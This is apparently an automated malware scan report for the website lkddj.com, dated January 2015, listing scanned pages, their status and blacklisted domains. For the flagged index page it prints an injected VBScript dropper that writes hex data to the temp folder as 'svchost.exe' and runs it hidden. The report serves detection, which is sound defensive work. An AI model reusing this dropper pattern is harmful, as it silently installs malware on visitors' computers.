Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lkddj.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lkddj.com/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:08 GMT Accept-Ranges: bytes ETag: "f46749a6a023d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 190489 Content-Location: http://lkddj.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 19:50:08 GMT X-Died: timeout at scan.pm line 1566. | clean |
http://lkddj.com/index.html | 200 OK Content-Length: 190489 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://lkddj.com/js/flash.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://lkddj.com/js/nav.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://lkddj.com/js/zhongtie.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://s15.cnzz.com/stat.php?id=4167029&web_id=4167029&show=pic | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://lkddj.com/js/tranbig5.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://lkddj.com/about/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:22 GMT Accept-Ranges: bytes ETag: "4448808a4f29d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135183 Content-Location: http://lkddj.com/about/index.html Content-Type: text/html Last-Modified: Tue, 06 Jan 2015 01:24:39 GMT | clean |
http://lkddj.com/about/index.html | 200 OK Content-Length: 135183 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hbjlpj.com | ||
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://lkddj.com/html/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:27 GMT Accept-Ranges: bytes ETag: "a4c17d6fd429d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135429 Content-Location: http://lkddj.com/html/index.html Content-Type: text/html Last-Modified: Tue, 06 Jan 2015 17:15:57 GMT | clean |
http://lkddj.com/html/index.html | 200 OK Content-Length: 135429 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hbyfzl.com | ||
http://lkddj.com/chanpin/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:29 GMT Accept-Ranges: bytes ETag: "b87e6428592ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 136236 Content-Location: http://lkddj.com/chanpin/index.html Content-Type: text/html Last-Modified: Wed, 07 Jan 2015 09:06:01 GMT | clean |
http://lkddj.com/chanpin/index.html | 200 OK Content-Length: 136236 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: kuaiyite.com | ||
http://lkddj.com/news_cn/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:33 GMT Accept-Ranges: bytes ETag: "30d8bfcde2ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 134820 Content-Location: http://lkddj.com/news_cn/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 00:57:17 GMT | clean |
http://lkddj.com/news_cn/index.html | 200 OK Content-Length: 134820 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dlmfsy.com | ||
http://lkddj.com/contact/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:36 GMT Accept-Ranges: bytes ETag: "26b065eb622bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135459 Content-Location: http://lkddj.com/contact/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 16:48:24 GMT | clean |
http://lkddj.com/contact/index.html | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://lkddj.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://lkddj.com/guest/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 23:24:47 GMT Accept-Ranges: bytes ETag: "5ac674dfe72bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135324 Content-Location: http://lkddj.com/guest/index.html Content-Type: text/html Last-Modified: Fri, 09 Jan 2015 08:40:08 GMT | clean |
http://lkddj.com/guest/index.html | 200 OK Content-Length: 135324 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dlmfsy.com | ||
http://lkddj.com/guest/0.html | 200 OK Content-Length: 16626 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hnlssn.com |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lkddj.com
Result:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 23:24:08 GMT
Accept-Ranges: bytes
ETag: "f46749a6a023d01:1657"
Server: Microsoft-IIS/6.0
Content-Length: 190489
Content-Location: http://lkddj.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 19:50:08 GMT
X-Died: timeout at scan.pm line 1566.
...190489 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lkddj.com
Referer: http://www.google.com/search?q=lkddj.com
Result:
The result is similar to the first query. There are no suspicious redirects found.